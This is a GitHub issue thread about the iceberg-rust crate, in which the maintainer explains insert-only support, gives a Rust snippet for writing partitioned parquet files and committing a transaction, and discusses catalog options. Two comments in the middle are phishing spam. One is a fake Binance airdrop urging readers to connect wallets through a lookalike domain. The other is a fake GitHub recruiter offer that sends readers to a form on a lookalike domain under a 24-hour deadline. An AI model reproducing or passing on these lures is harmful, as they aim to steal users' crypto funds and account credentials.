### ISSUE TITLE
Question: Datafile writer

### ISSUE THREAD

**Issue by ForeverAngry** [JanKaul/iceberg-rust#12]
It looks like this project does have the capability to insert and update records in an existing iceberg table. Am i correct this? Look forward to hearing!

**Comment by JanKaul** [comment]
Hey, the crate supports inserting but no updates because it can't handle deletes. The best way to insert is with datafusion.

Check out this test: https://github.com/JanKaul/iceberg-rust/blob/7b65b34504e710b62bd33d7d46c17be97929c08e/datafusion_iceberg/src/table.rs#L650

Do you want to use it with datafusion or as a rust library?

**Comment by ForeverAngry** [comment]
Hi! Well I'll have to do some reading on datafusion. I'm not familiar with it. But I was hoping to use it in rust, with a polars code base I have.

**Comment by JanKaul** [comment]
For now, you can have a look at the following method:

https://github.com/JanKaul/iceberg-rust/blob/7b65b34504e710b62bd33d7d46c17be97929c08e/datafusion_iceberg/src/table.rs#L521

I will try to simplify the writer design for non-datafusion use cases.

**Comment by ForeverAngry** [comment]
That would be awesome! Also I'd love to contribute - I've used the Java iceberg writer a bit, but if you had some diagram or pseudo code of the steps to complete a successful transaction (update, merge..erc) id be happy to help!  

Also, do you have an example of how I could test the writer with aws glue?

**Comment by JanKaul** [comment]
I haven't implemented the aws glue catalog, so you might need to implement it yourself.

If you have the catalog writing looks something like this:

```rust
        use iceberg_rust::arrow::write_parquet_partitioned;
        
        // Get table from catalog
        let tabular = catalog.load_table(Identifier::parse("my_catalog.my_schema.my_table")?);
        
        // Make sure its a table and not a view
        let table = if let Tabular::Table(table) = &tabular {
            Ok(table)
        } else {
            Err(Error::InvalidFormat("database entity is not a table".to_string()))
        }?;
        
        // Write arrow batches to object_store
        let metadata_files =
            write_parquet_partitioned(table, arrow_batches, None)
                .await?;
                
        // Create table transaction
        table
            .new_transaction(None)
            .append(metadata_files)
            .commit()
            .await?;

```

**Comment by JanKaul** [comment]
If you want to read iceberg tables with polars, this crate is not the best option for you. It's not able to do partition pruning with polars and always has to do a full table scan. [The apache repo](https://github.com/apache/iceberg-rust) is working on an expression system that will make this possible.

However, if you use this crate with datafusion it  performs partition pruning.

**Comment by ForeverAngry** [comment]
I'm open to using datafusion to read the data, the real need I have is just to be able to write partitioned iceberg files using a glue catalog.

**Comment by JanKaul** [comment]
If I have time I'll look into the glue catalog. But it could be a while.

**Comment by katsavav** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @robertstucke, @bijoungoc74, @dodikk, @squidy666, @gabimoncha, @antonpaisov, @pardodev

**Comment by apocanow1** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
hershyz, @skiyubon, @yueqianzhang, @MapleGu, @DayoWang, @imkk000, @wushshsha, @MacBookProne, @JuneshK, @xn3cr0nx, @soyamagic, @kol3D, @yancanmao, @agam, @saeta-eth, @stu01509, @ethgallucci, @gc3, @lucaspelloni2, @chocnut

**Comment by JanKaul** [comment]
As the REST catalog is becoming the standard catalog implementation, I'm not planning to add HMS support.
